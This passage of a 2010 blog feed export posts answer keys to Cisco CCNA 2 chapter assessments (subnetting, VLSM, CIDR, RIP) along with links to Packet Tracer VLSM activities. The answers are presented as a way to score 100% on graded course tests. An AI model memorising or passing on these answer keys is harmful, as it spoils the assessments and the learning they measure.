&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
subnet mask&lt;br /&gt;
&lt;br /&gt;
19. What are two functions of the network command used when configuring routing protocols? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
identifies which networks will be included in the routing updates&lt;br /&gt;
determines which interfaces can send and receive routing updates&lt;/span&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-1730455587004040713?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-19T06:00:03.065+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Challenge VLSM Calculation and Addressing Design - CCNA2 Chapter 6</title><link>http://vanzuearticles.blogspot.com/2010/03/challenge-vlsm-calculation-and.html</link><category>CCNA 2 Module</category><category>Download CCNA 2 Module - with file (.pka)</category><author>vanzue@gmail.com</author><pubDate>Fri, 12 Mar 2010 05:25:12 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-7813390535258185141</guid><description>&lt;span class="fullpost"&gt;In this activity, you will use the network address 172.16.0.0/16 to subnet and provide the IP addressing for a given topology. VLSM will be used so that the addressing requirements can be met using the 172.16.0.0/16 network.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_JYCZNSWdoTU/S5pAKnyXjII/AAAAAAAAAR4/z1EUQiR4nEM/s1600-h/challenge.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_JYCZNSWdoTU/S5pAKnyXjII/AAAAAAAAAR4/z1EUQiR4nEM/s320/challenge.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.ziddu.com/download/8936439/ChallengeVLSMCalculationandAddressingDesign.zip.html"&gt;Link Download File ( Challenge VLSM Calculation and Addressing Design.pka )&lt;/a&gt; &lt;span class="fullpost"&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-7813390535258185141?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-12T20:25:12.455+07:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/_JYCZNSWdoTU/S5pAKnyXjII/AAAAAAAAAR4/z1EUQiR4nEM/s72-c/challenge.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Basic VLSM Calculation and Addressing Design - CCNA2 chapter 6</title><link>http://vanzuearticles.blogspot.com/2010/03/basic-vlsm-calculation-and-addressing.html</link><category>CCNA 2 Module</category><category>Download CCNA 2 Module - with file (.pka)</category><author>vanzue@gmail.com</author><pubDate>Fri, 12 Mar 2010 05:20:57 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-2936479630623171073</guid><description>&lt;span class="fullpost"&gt;In this activity, you will use the network address 192.168.1.0/24 to subnet and provide the IP addressing for a given topology. VLSM will be used so that the addressing requirements can be met using the 192.168.1.0/24 network. &lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_JYCZNSWdoTU/S5o-1fLnwoI/AAAAAAAAARw/X_rGE_VLXqo/s1600-h/basic.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_JYCZNSWdoTU/S5o-1fLnwoI/AAAAAAAAARw/X_rGE_VLXqo/s320/basic.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;a href="http://www.ziddu.com/download/8936431/BasicVLSMCalculationandAddressingDesign.zip.html"&gt;Link Download File ( Basic VLSM Calculation and Addressing Design.pka )&lt;/a&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-2936479630623171073?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-12T20:20:57.584+07:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/_JYCZNSWdoTU/S5o-1fLnwoI/AAAAAAAAARw/X_rGE_VLXqo/s72-c/basic.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>CCNA2 Take Assessment Chapter 6 - 100%</title><link>http://vanzuearticles.blogspot.com/2010/03/ccna2-take-assessment-chapter-6-100.html</link><category>CCNA 2 Take Assessment</category><author>vanzue@gmail.com</author><pubDate>Fri, 12 Mar 2010 04:48:54 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-6410249490575037953</guid><description>&lt;span class="fullpost"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: red;"&gt;Expect minimum percentage: 100%&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
1. Refer to the exhibit. The network administrator wants to create a subnet for the point-to-point connection between the two routers. Which subnetwork mask would provide enough addresses for the point-to-point link with the least number of wasted addresses?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
255.255.255.252&lt;br /&gt;
&lt;br /&gt;
2. An additional subnet is required for a new Ethernet link between Router1 and Router2 as shown in the diagram. Which of the following subnet addresses can be configured in this network to provide a maximum of 14 useable addresses for this link while wasting the fewest addresses?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
192.1.1.224/28&lt;br /&gt;
&lt;br /&gt;
3. Refer to the exhibit. A network engineer is summarizing the two groups of routes on router R1 shown in the exhibit. Which summarization will work for all the subnets?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
192.168.0.0/21&lt;br /&gt;
&lt;br /&gt;
4. What is a supernet?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
a summarization of serveral IP classful networks into one IP address range&lt;br /&gt;
&lt;br /&gt;
5. In the network shown in the graphic, three bits were borrowed from the host portion of a Class C address. How many valid host addresses will be unused on the three point-to-point links combined if VLSM is not used?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
84&lt;br /&gt;
&lt;br /&gt;
6. What does VLSM allow a network administrator to do?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
utilize multiple subnet masks in the same IP address space&lt;br /&gt;
&lt;br /&gt;
7. Refer to the exhibit. The network administrator wants to minimize the number of entries in Router1’s routing table. What should the administrator implement on the network?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
CIDR&lt;br /&gt;
&lt;br /&gt;
8. Refer to the exhibit. A network technician enters the static route in R1 needed to reach network 10.1.1.0/24. A ping from the S0/0/0 interface on R1 to host B fails. The technician begins testing the network and has the following results:&lt;br /&gt;
1. pings from R1 to the S0/0/0 interface on R2....successful&lt;br /&gt;
2. pings from R1 to the Fa0/0 interface on R2....successful&lt;br /&gt;
3. pings from host B to hosts on the 10.1.1.0/24 network....successful&lt;br /&gt;
4. pings from host B to the Fa0/0 interface on R2....successful&lt;br /&gt;
5. pings from R2 to host B....successful.&lt;br /&gt;
What is the likely cause of the failure of the ping from R1 to host B?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
The default gateway on host B is not correctly set.&lt;br /&gt;
&lt;br /&gt;
9. Which three interior routing protocols support VLSM? (Choose three.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
OSPF&lt;br /&gt;
RIP v2&lt;br /&gt;
EIGRP&lt;br /&gt;
&lt;br /&gt;
10. Refer to the exhibit. A network administrator needs to create two subnetworks from 10.0.0.0/8 for a router running RIPv2. The Admin subnet requires 120 hosts and the Sales subnet requires 58 hosts. The network administrator assigned 10.0.1.128/25 to the Admin subnet. The Sales subnet is given 10.0.1.192/26. What will be the result of this addressing scheme?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
The subnets overlap and will be rejected by the router.&lt;br /&gt;
&lt;br /&gt;
11. Which of the following are contained in the routing updates of classless routing protocols? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
32-bit address&lt;br /&gt;
subnet mask&lt;br /&gt;
&lt;br /&gt;
12. A Class C address has been assigned for use in the network shown in the graphic. Using VLSM, which bit mask should be used to provide for the number of host addresses required on Router A, while wasting the fewest addresses?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
/27&lt;br /&gt;
&lt;br /&gt;
13. Refer to the exhibit. The number of required host addresses for each subnet in a network is listed in the exhibit. This number includes the host address requirements for all router ports and hosts on that subnet. After all device and router port address assignments are determined, what will be the total number of unused host addresses available?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
29&lt;br /&gt;
&lt;br /&gt;
14. What two advantages does CIDR provide to a network? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
reduced routing table size&lt;br /&gt;
reduced routing update traffic&lt;br /&gt;
&lt;br /&gt;
15. A network administrator is tasked with dividing up a class C network among the QA, Sales, and Administration departments. The QA department is made up of 10 people, the Sales is made up of 28 people, and the Administration has 6. Which two subnets masks adequately address the QA and Sales departments? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
255.255.255.224 for Sales&lt;br /&gt;
255.255.255.240 for QA&lt;br /&gt;
&lt;br /&gt;
16. Refer to the exhibit. In the network that is shown, the router interfaces are assigned the first address in each subnet. Which IP address would be usable for a host on one of the LANs in this network?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
192.168.2.130/25&lt;br /&gt;
&lt;br /&gt;
17. Refer to the exhibit. Which address is a broadcast address for one of the subnets that are shown in the exhibit?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
192.168.4.15/29&lt;br /&gt;
&lt;br /&gt;
18. Refer to the exhibit. What subnet mask will be applied by router B when it receives a RIPv1 update for the network 172.16.1.0?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
24&lt;br /&gt;
&lt;br /&gt;
19. Which of the following problems does VLSM help to alleviate?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
the shortage of IP addresses&lt;br /&gt;
&lt;br /&gt;
20. A router has a summary route to network 192.168.32.0/20 installed in its routing table. What range of networks are summarized by this route?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
192.168.32.0 – 192.168.47.0/24&lt;br /&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;a href="http://www.amazon.com/HDMI-meter-foot-cable-1080P/dp/B0002L5R78?ie=UTF8&amp;amp;tag=ar02-20&amp;amp;link_code=btl&amp;amp;camp=213689&amp;amp;creative=392969" target="_blank"&gt;HDMI (2 meter) 6 foot cable HQ 1080P 1.3b&lt;/a&gt;&lt;img alt="" border="0" height="1" src="http://www.assoc-amazon.com/e/ir?t=ar02-20&amp;amp;l=btl&amp;amp;camp=213689&amp;amp;creative=392969&amp;amp;o=1&amp;amp;a=B0002L5R78" style="border: medium none ! important; margin: 0px ! important; padding: 0px ! important;" width="1" /&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;img alt="" border="0" height="1" src="http://www.assoc-amazon.com/e/ir?t=ar02-20&amp;amp;l=btl&amp;amp;camp=213689&amp;amp;creative=392969&amp;amp;o=1&amp;amp;a=B002M3SOC4" style="border: medium none ! important; margin: 0px ! important; padding: 0px ! important;" width="1" /&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-6410249490575037953?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-12T19:48:54.553+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>CCNA 2 Take Assessment chapter 5 - 100%</title><link>http://vanzuearticles.blogspot.com/2010/03/ccna-2-take-assessment-chapter-5-100.html</link><category>CCNA 2 Take Assessment</category><author>vanzue@gmail.com</author><pubDate>Thu, 04 Mar 2010 10:25:14 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-7513783826717797087</guid><description>&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span"  style="font-family:'Trebuchet MS', Trebuchet, Verdana, sans-serif;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;div style="text-align: center;"&gt;&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span"  style="font-family:'Trebuchet MS', Trebuchet, Verdana, sans-serif;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ERouting chapter 5 - 100%&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span"  style="font-family:'Trebuchet MS', Trebuchet, Verdana, sans-serif;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;1. Refer to the exhibit. The Ethernet interface on Router2 goes down and the administrator notices that the route is still valid in the routing table of Router1. How much longer will it take for Router1 to mark the route invalid by setting the metric to 16?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;30 seconds&lt;br /&gt;&lt;br /&gt;2. Refer to the exhibit. Router1 and Router2 are running the RIPv1 protocol. The network administrator configures the command network 10.1.0.0 on Router1. What network will Router1 advertise to Router2?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;10.0.0.0/8&lt;br /&gt;&lt;br /&gt;3. Refer to the exhibit. Router1 is running RIPv1. What command was entered into Router1 to configure the gateway of last resort?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;ip route 0.0.0.0 0.0.0.0 S0/0/1&lt;br /&gt;&lt;br /&gt;4. Refer to the exhibit. All routers that are shown are running the RIP routing protocol. All unknown IP traffic must be forwarded to the ISP. What router or set of routers are recommended to have both a default route and the default-information originate command issued to implement this forwarding policy?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;only the gateway router&lt;br /&gt;&lt;br /&gt;5. Refer to the exhibit. All routers are configured with valid interface addresses in the indicated networks and are running RIPv1. The network is converged. Which routes are present in the routing tables?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;span class="Apple-style-span"  style="font-family:Verdana, sans-serif;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;All routers have all /30 routes. Routers A and E also have some of the /24 routes in their routing&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style=" ;font-size:16px;"&gt; table.&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;6. Refer to the exhibit. A network consists of multiple routers. What can be verified when the show ip protocols command is issued on one of the routers in the network?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;routing protocol configuration in use for IP on this router&lt;br /&gt;&lt;br /&gt;7. Which two statements are true regarding the characteristics of RIPv1? (Choose two).&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;It is a distance vector routing protocol.&lt;br /&gt;The data portion of a RIP message is encapsulated into a UDP segment.&lt;br /&gt;&lt;br /&gt;8. The following line was displayed in the output of the show ip route command.&lt;br /&gt;R 192.168.3.0/24 [120/3] via 192.168.2.2, 00:00:30, Serial0/0&lt;br /&gt;What is the value of the routing metric?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;3&lt;br /&gt;&lt;br /&gt;9. Which of the following is considered a limitation of RIP v1?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;RIP v1 does not send subnet mask information in its updates.&lt;br /&gt;&lt;br /&gt;10. What are three characteristics of the RIPv1 routing protocol? (Choose three.)&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;uses hop count as a metric&lt;br /&gt;considers a metric of 16 as infinity&lt;br /&gt;calculates metrics using the Bellman Ford algorithm&lt;br /&gt;&lt;br /&gt;11. Refer to the exhibit. The network that is shown is running RIPv1. The 192.168.10.0/24 network was recently added and will only contain end users. What command or set of commands should be entered on Router1 to prevent RIPv1 updates from being sent to the end user devices on the new network while still allowing this new network to be advertised to other routers?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;Router1(config-router)# passive-interface fastethernet 0/0&lt;br /&gt;&lt;br /&gt;12. Refer to the exhibit. What can be concluded from the routing table output of router B?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;The default-information originate command has been entered on A.&lt;br /&gt;&lt;br /&gt;13. Which command will display RIP activity as it occurs on a router?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;debug ip rip&lt;br /&gt;&lt;br /&gt;14. Refer to the exhibit. All routers in the exhibit are running RIP v1. The network administrator issues the show ip route command on router A. What routes would appear in the routing table output if the network is converged? (Choose two).&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;R 192.168.2.0/24 [120/1]&lt;br /&gt;R 10.10.1.0/24 [120/2]&lt;br /&gt;&lt;br /&gt;15. What is the default update period in seconds for the RIP routing protocol?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;30&lt;br /&gt;&lt;br /&gt;16. Refer to the exhibit. What can be concluded from the output of the show ip route command?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;There are two equal cost paths to network 172.16.100.128.&lt;br /&gt;&lt;br /&gt;17. &lt;span class="Apple-style-span"  style=" ;font-family:Verdana, sans-serif;"&gt;Which of the following would be the correct command sequence to enable RIP on Router B for all connected networks?&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;&lt;span class="Apple-style-span"  style="font-family:Verdana, sans-serif;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;RouterB(config)# router rip&lt;br /&gt;RouterB(config-router)# network 198.16.4.0&lt;br /&gt;RouterB(config-router)# network 210.36.7.0&lt;br /&gt;RouterB(config-router)# network 220.17.29.0&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;18. What will happen if an interface IP address is entered for the address portion of the network command in a RIPv1 configuration instead of a network address?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;All interfaces in the same classful network as the configured address will be included in the RIPv1 routing process.&lt;br /&gt;&lt;br /&gt;19. Which command or set of commands will stop the RIP routing process?&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0); "&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;ans:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;RouterB(config)# no router rip&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div&gt;&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span"  style="font-family:'Trebuchet MS', Trebuchet, Verdana, sans-serif;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span"  style="font-family:'Trebuchet MS', Trebuchet, Verdana, sans-serif;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;20.&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; "&gt;Refer to the exhibit. RIPv1 is running on all three routers. All interfaces have been correctly configured with addresses in the address ranges that are shown. Which route would you see in the routing table on router CHI if the routers are configured with the commands that are displayed in the exhibit?&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span"  style="font-family:'Trebuchet MS', Trebuchet, Verdana, sans-serif;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; "&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; "&gt;&lt;span class="Apple-style-span"  style="color:#33CC00;"&gt;ans :&lt;/span&gt;&lt;br /&gt;192.168.0.0/24&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-7513783826717797087?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-05T01:25:14.887+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>CCNA 2 Take Assessment Chapter 4 - 100%</title><link>http://vanzuearticles.blogspot.com/2010/03/ccna-2-take-assessment-chapter-4-100.html</link><category>CCNA 2 Take Assessment</category><author>vanzue@gmail.com</author><pubDate>Tue, 02 Mar 2010 18:18:48 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-73208030405689834</guid><description>&lt;span style="color: rgb(255, 0, 0);"&gt;Expect minimum percentage: 100%&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. What does the RIP holddown timer do?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;instructs routers to ignore updates, for a specified time or event, about possible inaccessible routes&lt;br /&gt;&lt;br /&gt;2. What metric does the RIP routing protocol consider to be infinity?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;16&lt;br /&gt;&lt;br /&gt;3. What is a routing loop?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;a condition where a packet is constantly transmitted within a series of routers without ever reaching its intended destination&lt;br /&gt;&lt;br /&gt;4. Which two statements are true regarding the function of the RIPv1 routing updates? (Choose two).&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;updates are broadcast at regular intervals&lt;br /&gt;broadcasts are sent to 255.255.255.255&lt;br /&gt;&lt;br /&gt;5. Which of the following can exist in a distance vector network that has not converged? (Choose three.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;routing loops&lt;br /&gt;inconsistent traffic forwarding&lt;br /&gt;inconsistent routing table entries&lt;br /&gt;&lt;br /&gt;6. Refer to the exhibit. What path will packets from the 192.168.1.0/24 network travel to reach the 10.0.0.0/8 network if RIP is the active routing protocol?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The path will be router A -&gt; router D -&gt; router E.&lt;br /&gt;&lt;br /&gt;7. What is the purpose of the TTL field in the IP header?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;limits the time or hops that a packet can traverse through the network before it should be discarded&lt;br /&gt;&lt;br /&gt;8. Which two conditions are most likely to cause a routing loop? (Choose two.)&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;inconsistent routing tables&lt;br /&gt;incorrectly configured static routes&lt;br /&gt;&lt;br /&gt;9. Refer to the exhibit. If all routers are using RIP, how many rounds of updates will occur before all routers know all networks?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;3&lt;br /&gt;&lt;br /&gt;10. The graphic shows a network that is configured to use RIP routing protocol. Router2 detects that the link to Router1 has gone down. It then advertises the network for this link with a hop count metric of 16. Which routing loop prevention mechanism is in effect?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;route poisoning&lt;br /&gt;&lt;br /&gt;11. Refer to the exhibit. The routers in this network are running RIP. Router A has not received an update from Router B in over three minutes. How will Router A respond?&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ans:&lt;/span&gt;&lt;br /&gt;The Invalid timer will mark the route as unusable if an update has not been received in 180 